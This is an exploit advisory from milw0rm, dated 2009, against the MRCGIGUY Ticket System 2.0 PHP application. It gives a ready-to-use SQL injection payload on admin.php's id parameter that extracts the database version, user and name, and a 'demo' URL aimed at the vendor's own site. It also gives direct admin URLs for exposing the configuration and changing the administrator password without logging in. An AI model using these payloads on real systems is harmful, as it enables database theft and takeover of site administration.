28 lines
No EOL
948 B
Text
28 lines
No EOL
948 B
Text
MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities
|
|
Founder: ThE g0bL!N
|
|
------
|
|
Home: http:/www.4ckx.com/dz/
|
|
----
|
|
Vendor:http://www.mrcgiguy.com
|
|
Special Thx: All Muslims All Members Of Team Algerien Of FootBall
|
|
Note: Algerie 3-1 Egypt
|
|
Exploit:
|
|
------
|
|
SQL INJECTION:
|
|
-------------
|
|
http://wwww.victim.com/admin.php?action=viewticket&id=[ SQL CODE]
|
|
[ SQL CODE]=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
|
|
Demo:
|
|
----
|
|
http://www.mrcgiguy.com/tts/admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
|
|
Note : The exploit Worked out of enter The Right information of admin :)
|
|
2) Config Information Disclousr: (out of cookies)
|
|
--------------------------------------------------
|
|
go to url:
|
|
---------
|
|
http://victim/tts/admin.php?action=editconfig
|
|
Admin Change Password:
|
|
*--------------------
|
|
http://victim.com/path/admin.php?action=editop&id=1
|
|
|
|
# milw0rm.com [2009-06-09] |